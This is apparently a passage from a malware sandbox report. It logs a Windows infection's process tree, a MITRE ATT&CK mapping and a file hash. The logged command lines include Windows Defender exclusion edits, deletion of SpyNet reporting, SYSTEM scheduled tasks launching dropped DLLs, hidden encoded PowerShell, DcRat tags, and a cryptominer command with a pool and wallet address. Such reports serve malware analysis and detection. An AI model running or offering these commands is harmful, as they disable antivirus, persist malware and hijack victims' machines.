REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\PEKrPVrLutUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WQqkELkVHOYU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\WQqkELkVHOYU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mQvpiNUsNPjLC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mQvpiNUsNPjLC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\UrkGLyjigLRybTVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\UrkGLyjigLRybTVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\YYFeagcQEOcPvCau\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\YYFeagcQEOcPvCau\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:6064 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MiKcmJhqU" /t REG_DWORD /d 0 /reg:323⤵PID:4324
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MiKcmJhqU" /t REG_DWORD /d 0 /reg:324⤵PID:5516
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MiKcmJhqU" /t REG_DWORD /d 0 /reg:643⤵PID:4120
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NFyWcaFNQqjkebtjyfR" /t REG_DWORD /d 0 /reg:323⤵PID:956
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NFyWcaFNQqjkebtjyfR" /t REG_DWORD /d 0 /reg:643⤵PID:5396
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PEKrPVrLutUn" /t REG_DWORD /d 0 /reg:323⤵PID:3096
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WQqkELkVHOYU2" /t REG_DWORD /d 0 /reg:323⤵PID:6068
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WQqkELkVHOYU2" /t REG_DWORD /d 0 /reg:643⤵PID:4000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mQvpiNUsNPjLC" /t REG_DWORD /d 0 /reg:323⤵PID:5820
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mQvpiNUsNPjLC" /t REG_DWORD /d 0 /reg:643⤵PID:2140
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\PEKrPVrLutUn" /t REG_DWORD /d 0 /reg:643⤵PID:5924
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\UrkGLyjigLRybTVB /t REG_DWORD /d 0 /reg:323⤵PID:740
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\UrkGLyjigLRybTVB /t REG_DWORD /d 0 /reg:643⤵PID:5532
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:3672
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:4996
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:5468
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:716
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX /t REG_DWORD /d 0 /reg:643⤵PID:6000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\YYFeagcQEOcPvCau /t REG_DWORD /d 0 /reg:323⤵PID:1632
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\chgvdkHPJjDmSvOZX /t REG_DWORD /d 0 /reg:323⤵PID:6052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\YYFeagcQEOcPvCau /t REG_DWORD /d 0 /reg:643⤵PID:5884
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gnaDmwSwD" /SC once /ST 09:42:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- DcRat
- Creates scheduled task(s)
PID:5936 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:228
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gnaDmwSwD"2⤵PID:5164
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gnaDmwSwD"2⤵PID:1244
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OvvioKEypuBLsTFYZ" /SC once /ST 10:43:28 /RU "SYSTEM" /TR "\"C:\Windows\Temp\YYFeagcQEOcPvCau\tKpADNrKyKjYycp\ucMKVtG.exe\" dM /ynsite_iduwB 385118 /S" /V1 /F2⤵
- DcRat
- Creates scheduled task(s)
PID:1200
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "OvvioKEypuBLsTFYZ"2⤵PID:4572
-
-
C:\Users\Admin\AppData\Roaming\hueeirvC:\Users\Admin\AppData\Roaming\hueeirv1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:5956
-
C:\Users\Admin\AppData\Roaming\hreeirvC:\Users\Admin\AppData\Roaming\hreeirv1⤵
- Suspicious use of SetThreadContext
PID:5500 -
C:\Users\Admin\AppData\Roaming\hreeirvC:\Users\Admin\AppData\Roaming\hreeirv2⤵PID:5724
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 3968 -ip 39681⤵PID:948
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵PID:4744
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:6040
-
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:4000
-
C:\Windows\windefender.exeC:\Windows\windefender.exe1⤵
- Modifies data under HKEY_USERS
PID:5108 -
C:\Windows\rss\csrss.exe"C:\Windows\rss\csrss.exe"2⤵PID:3452
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3452 -s 2523⤵
- Program crash
PID:4052
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABTAHQAcgBpAG4AZwBJAGQAcwAuAGUAeABlADsA1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3828
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4880 -ip 48801⤵PID:5348
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:5396
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam2⤵PID:5940
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam2⤵PID:2252
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:5708
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:5864
-
C:\Windows\Temp\YYFeagcQEOcPvCau\tKpADNrKyKjYycp\ucMKVtG.exeC:\Windows\Temp\YYFeagcQEOcPvCau\tKpADNrKyKjYycp\ucMKVtG.exe dM /ynsite_iduwB 385118 /S1⤵
- Checks computer location settings
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
PID:5508 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bgKZxxDIOpRGITjYTe"2⤵PID:5400
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:322⤵PID:4556
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:808
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:642⤵PID:5260
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:4652
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\MiKcmJhqU\fqlRXR.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "tCfKGXDvAPRRvLf" /V1 /F2⤵
- DcRat
- Drops file in Windows directory
- Creates scheduled task(s)
PID:5776
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "tCfKGXDvAPRRvLf2" /F /xml "C:\Program Files (x86)\MiKcmJhqU\NzfNYDa.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
PID:4556 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:3672
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "tCfKGXDvAPRRvLf"2⤵PID:3852
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "tCfKGXDvAPRRvLf"2⤵PID:1072
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "WLJiZzmdxByrvR" /F /xml "C:\Program Files (x86)\WQqkELkVHOYU2\vieUZjt.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
PID:5424
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yUJcmcRyNwKRa2" /F /xml "C:\ProgramData\UrkGLyjigLRybTVB\LZMUBmR.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
PID:3536
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "iOUfqyxVtpISCFCEp2" /F /xml "C:\Program Files (x86)\NFyWcaFNQqjkebtjyfR\mpKroGd.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
PID:5860
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "phKAbPCvhOcihqTrHht2" /F /xml "C:\Program Files (x86)\mQvpiNUsNPjLC\JVcufME.xml" /RU "SYSTEM"2⤵
- DcRat
- Creates scheduled task(s)
PID:3320
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "hNXJOWJzZwASvpUks" /SC once /ST 03:11:19 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\YYFeagcQEOcPvCau\YTpesbeH\CpHMowe.dll\",#1 /AXsite_idqFS 385118" /V1 /F2⤵
- DcRat
- Drops file in System32 directory
- Drops file in Windows directory
- Creates scheduled task(s)
- Modifies data under HKEY_USERS
PID:5448
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "hNXJOWJzZwASvpUks"2⤵PID:4528
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:322⤵PID:3560
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:5424
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:642⤵PID:5472
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:5304
-
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:5696
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "OvvioKEypuBLsTFYZ"2⤵PID:4124
-
-
C:\Windows\system32\compattelrunner.exeC:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW1⤵PID:2596
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\YYFeagcQEOcPvCau\YTpesbeH\CpHMowe.dll",#1 /AXsite_idqFS 3851181⤵
- Enumerates VirtualBox registry keys
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
PID:5680 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\YYFeagcQEOcPvCau\YTpesbeH\CpHMowe.dll",#1 /AXsite_idqFS 3851182⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
PID:2624 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "hNXJOWJzZwASvpUks"3⤵PID:2188
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 392 -p 864 -ip 8641⤵PID:2292
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 3852 -ip 38521⤵PID:5452
-
C:\Users\Admin\AppData\Local\Temp\izhoqjhi.exeC:\Users\Admin\AppData\Local\Temp\izhoqjhi.exe1⤵
- Suspicious use of SetThreadContext
PID:5280 -
C:\Users\Admin\AppData\Local\Temp\izhoqjhi.exeC:\Users\Admin\AppData\Local\Temp\izhoqjhi.exe2⤵PID:4888
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwATQBlAHMAcwBhAGcAZQBcAFMAdQBwAHAAbwByAHQAcwBEAHkAbgBhAG0AaQBjAFAAYQByAHQAaQB0AGkAbwBuAHMALgBlAHgAZQAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUAIAAtAEYAbwByAGMAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAE0AZQBzAHMAYQBnAGUAXABTAHUAcABwAG8AcgB0AHMARAB5AG4AYQBtAGkAYwBQAGEAcgB0AGkAdABpAG8AbgBzAC4AZQB4AGUA1⤵PID:1204
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2268 -ip 22681⤵PID:3256
-
C:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exeC:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exe1⤵
- Suspicious use of SetThreadContext
PID:5940 -
C:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exeC:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exe2⤵
- Suspicious use of SetThreadContext
PID:5376 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe3⤵
- Suspicious use of SetThreadContext
PID:780 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: GetForegroundWindowSpam
PID:1076 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\AddInProcess.exe -o xmr.2miners.com:2222 -u 4BBSeeCcr5wHcnUb8nD4AmBTU39d2dELQiDDTAamz1iWT7GjRdpsZi38VpMH48oY9VYwUdBgTCYshjQGRuu6mcoH1fE9LC5.RIG_CPU -p x --algo rx/0 --cpu-max-threads-hint=505⤵
- Suspicious use of FindShellTrayWindow
PID:5060
-
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 4632 -ip 46321⤵PID:5420
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5064 -ip 50641⤵PID:4836
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 4000 -ip 40001⤵PID:940
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 4888 -ip 48881⤵PID:1800
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5164 -ip 51641⤵PID:1604
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 2316 -ip 23161⤵PID:5012
-
C:\Users\Admin\AppData\Roaming\TypeId\Tags.exeC:\Users\Admin\AppData\Roaming\TypeId\Tags.exe1⤵PID:1556
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4744 -ip 47441⤵PID:2260
-
C:\Users\Admin\AppData\Local\Detail\ekenek\StringIds.exeC:\Users\Admin\AppData\Local\Detail\ekenek\StringIds.exe1⤵PID:5392
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5392 -s 7962⤵
- Program crash
PID:1208
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 5392 -ip 53921⤵PID:3936
-
C:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exeC:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exe1⤵PID:4472
-
C:\Users\Admin\AppData\Roaming\TypeId\Tags.exeC:\Users\Admin\AppData\Roaming\TypeId\Tags.exe1⤵PID:1532
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1532 -s 7442⤵PID:4196
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2188 -ip 21881⤵PID:3460
-
C:\Windows\system32\dwm.exe"dwm.exe"1⤵
- Checks SCSI registry key(s)
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4636
-
C:\Users\Admin\AppData\Roaming\hueeirvC:\Users\Admin\AppData\Roaming\hueeirv1⤵
- Looks for VMWare services registry key.
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3396
-
C:\Users\Admin\AppData\Roaming\hreeirvC:\Users\Admin\AppData\Roaming\hreeirv1⤵
- Looks for VMWare services registry key.
- Checks whether UAC is enabled
- Maps connected drives based on registry
PID:2004 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2004 -s 3922⤵
- Program crash
PID:5276
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 2004 -ip 20041⤵PID:1272
-
C:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exeC:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exe1⤵PID:184
-
C:\Users\Admin\AppData\Local\Detail\ekenek\StringIds.exeC:\Users\Admin\AppData\Local\Detail\ekenek\StringIds.exe1⤵
- Looks for VMWare services registry key.
- Checks whether UAC is enabled
- Maps connected drives based on registry
PID:3204 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3204 -s 8042⤵
- Program crash
PID:4304
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3204 -ip 32041⤵PID:1912
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1912 -ip 19121⤵PID:4660
-
C:\Users\Admin\AppData\Roaming\TypeId\Tags.exeC:\Users\Admin\AppData\Roaming\TypeId\Tags.exe1⤵PID:1436
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2596 -ip 25961⤵PID:5780
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 3452 -ip 34521⤵PID:6012
-
C:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exeC:\Users\Admin\AppData\Roaming\Message\SupportsDynamicPartitions.exe1⤵PID:4980
-
C:\Users\Admin\AppData\Roaming\TypeId\Tags.exeC:\Users\Admin\AppData\Roaming\TypeId\Tags.exe1⤵PID:224
-
C:\Users\Admin\AppData\Roaming\hueeirvC:\Users\Admin\AppData\Roaming\hueeirv1⤵
- Checks SCSI registry key(s)
PID:4124
-
C:\Users\Admin\AppData\Roaming\hreeirvC:\Users\Admin\AppData\Roaming\hreeirv1⤵PID:380
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution: 3
- Registry Run Keys / Startup Folder: 3
- Create or Modify System Process: 4
- Windows Service: 4
- Pre-OS Boot: 1
- Bootkit: 1
- Scheduled Task/Job: 1
Privilege Escalation
- Abuse Elevation Control Mechanism: 1
- Bypass User Account Control: 1
- Boot or Logon Autostart Execution: 3
- Registry Run Keys / Startup Folder: 3
- Create or Modify System Process: 4
- Windows Service: 4
- Scheduled Task/Job: 1
Defense Evasion
- Abuse Elevation Control Mechanism: 1
- Bypass User Account Control: 1
- Impair Defenses: 2
- Disable or Modify Tools: 1
- Modify Registry: 10
- Pre-OS Boot: 1
- Bootkit: 1
- Subvert Trust Controls: 1
- Install Root Certificate: 1
- Virtualization/Sandbox Evasion: 3
Downloads
-
Filesize
6.6MB
MD567362551290f4a2342f1db92cadb1a8b
SHA1d3cbf27a6307b7fe4672c785be88c26c6f1c7800
